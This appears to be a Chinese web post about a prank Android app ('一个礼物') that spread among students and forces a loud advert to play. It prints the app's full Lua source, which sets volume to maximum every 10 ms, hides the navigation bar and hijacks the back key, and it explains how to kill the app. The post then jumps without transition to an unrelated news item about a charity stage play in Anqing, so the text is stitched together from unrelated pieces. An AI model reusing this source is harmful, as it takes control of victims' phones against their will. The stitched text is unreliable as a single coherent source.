近日，一个“名为一个礼物”的文件在大学中传播开来，手机只要点开就会强制播放“o泡果奶”的魔性广告声，中招者会因该原因产生“社会性死亡”。该文件疑似为木马病毒？

B站链接：

https://b23.tv/bU6LT4

https://b23.tv/mxbkDy

抖音链接：

https://v.douyin.com/JfPBqPQ/

https://v.douyin.com/JfPMQYa/

https://v.douyin.com/JfPLhn2/

https://v.douyin.com/JfPaKkW/

https://v.douyin.com/JfPhwNa/

https://v.douyin.com/JfP5nM3/

不过这还不算什么，好不容易骗取了使用者的信任和手机权限，结果中了恶意程序的之后，只是放一段欧泡果奶？

这玩意以前也流行过一次，我记得是开家长会的时候，当时有一个同学点开了，不过那时候点开之后直接最大音量直接放一个女性浪叫的声音，关还关不掉，那才是真正的社会性死亡。

而且出现人传人现象，很多人去恶搞坑害朋友。

降低杀伤力来提高传播力，相比浪叫，低杀伤的O泡可能会有更多人选择传播。

跟研究流感病毒模型似的，这很新冠，新冠直呼内行

这个程序的源码也就20行，Lua脚本。

里面只有一个循环，劫持你的返回键，然后把音量开最大，但是循环执行非常快所以你的音量是调不下来的。至于截图那是因为这个Lua模块本身封装了这个功能，实际没有调用过。

解决方案：使用任务管理直接kill掉，就是你日常切换视图还能清内存的那个手势/按键。

这次的果奶和去年的ta是同一份程序，包名和版本号都没改，就改了个背景音乐。

想逆向实践看源码的可以找点Lua逆向工具，没混淆也没加密。

代码如下：

-- main.lua --

require("import")

import("android.app.*")

import("android.os.*")

import("android.widget.*")

import("android.view.*")

import("android.view.View")

import("android.content.Context")

import("android.media.MediaPlayer")

import("
android.media.AudioManager") -- 音量控制模块

import("com.androlua.Ticker") -- Ticker：定时触发器

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) --音量调大

activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)

m = MediaPlayer() --播放器

m.reset()

m.setDataSource(activity.getLuaDir() .. "/mc.mp3") -- 引用包里的“O泡果奶”

m.prepare()

m.start()

m.setLooping(true)

ti = Ticker() --计时器计时触发

ti.Period = 10 -- 间隔为10ms

function ti.onTick() -- 设置ticker要触发的函数

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) -- 和上面一模一样

activity.getDecorView().setSystemUiVisibility(
View.SYSTEM_UI_FLAG_HIDE_NAVIGATION |
View.SYSTEM_UI_FLAG_IMMERSIVE) -- 隐藏navbar等

end

ti.start() -- 开启ticker,每10ms执行一次上面的函数

function onKeyDown(A0_0, A1_1) -- 监听按键，不调用外部方法的话就相当于劫持下来了

if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then -- 如果按键是返回键

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) -- 设置音量为最大

end -- 相当于把返回键变成了音量最大键

return true

end

1月13日，由迎江区委统战部、区残联、区妇联、区工商联、团区委共同主办，安庆慧灵承办的慈善答谢会暨《生命是一份礼物》舞台剧首演在石化俱乐部举行，市政协副主席洪爱敏、市妇联副主席华文红，迎江区委常委、组织部长、统战部长陈海维出席活动，近千人剧场座无虚席。

活动上播放了慧灵公益宣传片，安庆慧灵“领头雁”徐晓健女士深情致词并为爱心单位、团体、志愿者颁发证书，本真出演《生命是一份礼物》的慧灵残障儿童和老师们首演成功，给现场观众留下了深刻印象，也接受了一场触碰心灵的精神洗礼。

安庆迎江慧灵扶助中心创办于2015年7月，填补了安庆地区16岁以上心智障碍群体服务、就业、托养的空白，用人性化的服务理念和模式，让一个个看似不完美的生命活得更有尊严。